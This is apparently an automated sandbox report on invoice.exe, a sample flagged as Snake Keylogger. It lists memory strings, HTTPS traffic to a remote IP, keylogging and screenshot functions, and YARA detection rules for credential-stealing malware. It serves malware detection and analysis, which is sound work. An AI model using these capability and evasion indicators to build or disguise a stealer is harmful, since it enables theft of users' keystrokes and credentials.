Source: invoice.exe, 00000002.00000002.4138430220.000000000430F000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004337000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000042C2000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004589000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000044B4000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004466000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: invoice.exe, 00000002.00000002.4138430220.0000000004312000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004564000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.00000000042C8000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.0000000004441000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.000000000446C000.00000004.00000800.00020000.00000000.sdmp, invoice.exe, 00000002.00000002.4138430220.000000000429D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: invoice.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: invoice.exe, 00000002.00000002.4135565493.00000000032EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49754 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.invoice.exe.4e83658.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.invoice.exe.4e83658.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: invoice.exe PID: 7496, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: invoice.exe PID: 7644, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

.NET source code contains very large array initializations

Source: invoice.exe, Leverancier.cs

Large array initialization: : array initializer size 668424

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: invoice.exe

Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_016FE42C	0_2_016FE42C
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DED40	0_2_057DED40
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DDB70	0_2_057DDB70
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DED30	0_2_057DED30
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DCB68	0_2_057DCB68
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DDB60	0_2_057DDB60
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DCB59	0_2_057DCB59
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DBBB0	0_2_057DBBB0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DBBAB	0_2_057DBBAB
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DE2D8	0_2_057DE2D8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_057DE2CB	0_2_057DE2CB
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF27E8	0_2_07EF27E8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF3720	0_2_07EF3720
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF0040	0_2_07EF0040
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF3F68	0_2_07EF3F68
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF27E3	0_2_07EF27E3
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF3713	0_2_07EF3713
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EFB620	0_2_07EFB620
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EFB613	0_2_07EFB613
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF25CB	0_2_07EF25CB
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF25D8	0_2_07EF25D8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF44A8	0_2_07EF44A8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF4498	0_2_07EF4498
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF2368	0_2_07EF2368
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF2378	0_2_07EF2378
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EFD258	0_2_07EFD258
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EFB1E8	0_2_07EFB1E8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF21CB	0_2_07EF21CB
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF21D8	0_2_07EF21D8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF0006	0_2_07EF0006
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF3013	0_2_07EF3013
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF2F68	0_2_07EF2F68
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF0F68	0_2_07EF0F68
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF0F63	0_2_07EF0F63
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF2F5B	0_2_07EF2F5B
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF3F59	0_2_07EF3F59
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EFCE20	0_2_07EFCE20
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EFADB0	0_2_07EFADB0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF0D68	0_2_07EF0D68
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF0D58	0_2_07EF0D58
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF1B28	0_2_07EF1B28
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF1B38	0_2_07EF1B38
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF1AA8	0_2_07EF1AA8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EFEAA3	0_2_07EFEAA3
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF2A40	0_2_07EF2A40
Source: C:\Users\user\Desktop\invoice.exe	Code function: 0_2_07EF2A33	0_2_07EF2A33
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9D278	2_2_02F9D278
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F95362	2_2_02F95362
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9A088	2_2_02F9A088
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F97118	2_2_02F97118
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9C738	2_2_02F9C738
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9C46C	2_2_02F9C46C
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9CA08	2_2_02F9CA08
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F969A0	2_2_02F969A0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9E988	2_2_02F9E988
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F93E09	2_2_02F93E09
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9CFAB	2_2_02F9CFAB
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9CCD8	2_2_02F9CCD8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9C19F	2_2_02F9C19F
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F929E0	2_2_02F929E0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9E97B	2_2_02F9E97B
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_02F9F960	2_2_02F9F960
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D48FB0	2_2_05D48FB0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D481D0	2_2_05D481D0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D47B78	2_2_05D47B78
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D415F8	2_2_05D415F8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D415E8	2_2_05D415E8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4C558	2_2_05D4C558
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D40D48	2_2_05D40D48
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4E548	2_2_05D4E548
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4C548	2_2_05D4C548
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4E538	2_2_05D4E538
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D40D39	2_2_05D40D39
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D40498	2_2_05D40498
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D46488	2_2_05D46488
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D40489	2_2_05D40489
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D43450	2_2_05D43450
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D46478	2_2_05D46478
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D43460	2_2_05D43460
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4FC18	2_2_05D4FC18
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4DC19	2_2_05D4DC19
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4BC38	2_2_05D4BC38
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4DC28	2_2_05D4DC28
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4BC29	2_2_05D4BC29
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D42FF9	2_2_05D42FF9
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4D798	2_2_05D4D798
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4B798	2_2_05D4B798
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4D787	2_2_05D4D787
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D45780	2_2_05D45780
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4F788	2_2_05D4F788
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D48FA1	2_2_05D48FA1
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4B7A8	2_2_05D4B7A8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D42758	2_2_05D42758
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D42748	2_2_05D42748
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D45770	2_2_05D45770
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4F778	2_2_05D4F778
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D47710	2_2_05D47710
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D47720	2_2_05D47720
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D44ED0	2_2_05D44ED0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D44EC0	2_2_05D44EC0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D41E98	2_2_05D41E98
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D41EA8	2_2_05D41EA8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4EE57	2_2_05D4EE57
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D46E70	2_2_05D46E70
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4CE78	2_2_05D4CE78
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4CE67	2_2_05D4CE67
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D46E62	2_2_05D46E62
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4EE68	2_2_05D4EE68
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D44610	2_2_05D44610
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D44620	2_2_05D44620
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4E9D8	2_2_05D4E9D8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4C9D8	2_2_05D4C9D8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4E9C8	2_2_05D4E9C8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4C9E8	2_2_05D4C9E8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D41190	2_2_05D41190
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D411A0	2_2_05D411A0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4A938	2_2_05D4A938
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4A928	2_2_05D4A928
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4C0C8	2_2_05D4C0C8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D408F0	2_2_05D408F0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D408E0	2_2_05D408E0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4C0B7	2_2_05D4C0B7
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D438B8	2_2_05D438B8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4E0B8	2_2_05D4E0B8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4E0A7	2_2_05D4E0A7
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D40040	2_2_05D40040
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D40006	2_2_05D40006
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D43008	2_2_05D43008
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D46030	2_2_05D46030
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D46021	2_2_05D46021
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D45BD8	2_2_05D45BD8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D45BC9	2_2_05D45BC9
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D42BB0	2_2_05D42BB0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D42BA0	2_2_05D42BA0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D47B69	2_2_05D47B69
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4B318	2_2_05D4B318
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4531A	2_2_05D4531A
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4B307	2_2_05D4B307
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D42300	2_2_05D42300
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4D308	2_2_05D4D308
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D45328	2_2_05D45328
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D472C8	2_2_05D472C8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4D2F7	2_2_05D4D2F7
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D422F0	2_2_05D422F0
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4F2F8	2_2_05D4F2F8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D4F2E7	2_2_05D4F2E7
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D472B8	2_2_05D472B8
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D41A50	2_2_05D41A50
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D41A41	2_2_05D41A41
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D44A78	2_2_05D44A78
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D44A68	2_2_05D44A68
Source: C:\Users\user\Desktop\invoice.exe	Code function: 2_2_05D46A18	2_2_05D46A18

Source: invoice.exe

Static PE information: invalid certificate

Source: invoice.exe, 00000000.00000002.1711700056.0000000004E83000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs invoice.exe
Source: invoice.exe, 00000000.00000002.1711700056.0000000004AEA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs invoice.exe
Source: invoice.exe, 00000000.00000002.1709207264.000000000147E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs invoice.exe
Source: invoice.exe, 00000000.00000000.1671921834.0000000000EB2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamezHvc.exe@ vs invoice.exe
Source: invoice.exe, 00000000.00000002.1714954987.0000000007B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs invoice.exe
Source: invoice.exe, 00000000.00000002.1711179845.0000000003502000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs invoice.exe
Source: invoice.exe, 00000002.00000002.4133342732.0000000001367000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILE< vs invoice.exe
Source: invoice.exe, 00000002.00000002.4132870602.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs invoice.exe
Source: invoice.exe	Binary or memory string: OriginalFilenamezHvc.exe@ vs invoice.exe

Source: invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice.exe.4ec7078.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice.exe.4e83658.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice.exe.4e83658.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice.exe.4ec7078.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4132870602.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
